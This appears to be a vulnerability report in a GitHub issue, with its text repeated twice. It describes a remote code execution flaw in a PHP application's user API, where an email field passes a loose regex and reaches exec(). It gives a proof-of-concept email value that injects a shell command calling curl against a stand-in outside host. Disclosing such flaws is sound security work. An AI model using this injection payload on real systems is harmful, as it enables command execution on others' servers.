You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
The $email is from Request::parse().
Lines 44-56 of the "Request.php" show us that we can input any data.
Lines 294-295 of the "user.php" use a vulnerable regular expression because there is no backslash in front of the dot,the dot can match anything.
Then,the email income the EmailSender::send()
Let us check the function.
We can exploit function "exec" to Remote Code Execute.
Vulnerability exploitation process:
Register and login.
Input the POC.
We can check 'result.txt' and decode it.
POC code:
youyou@qq.com'xx|curl test.server.com;xx'xx
Your exp should be in test.server.com.We can execute any remote command.
The text was updated successfully, but these errors were encountered:
List of Vulnerable path
Vulnerable path /application/controllers/api/user.php
Vulnerable path /application/libraries/service/Network/Request.php
The process of code audit
The $email is from Request::parse().
Lines 44-56 of the "Request.php" show us that we can input any data.
Lines 294-295 of the "user.php" use a vulnerable regular expression because there is no backslash in front of the dot,the dot can match anything.
Then,the email income the EmailSender::send()
Let us check the function.
We can exploit function "exec" to Remote Code Execute.
Vulnerability exploitation process:
Register and login.
Input the POC.
We can check 'result.txt' and decode it.
POC code:
youyou@qq.com'xx|curl test.server.com;xx'xx
Your exp should be in test.server.com.We can execute any remote command.
The text was updated successfully, but these errors were encountered: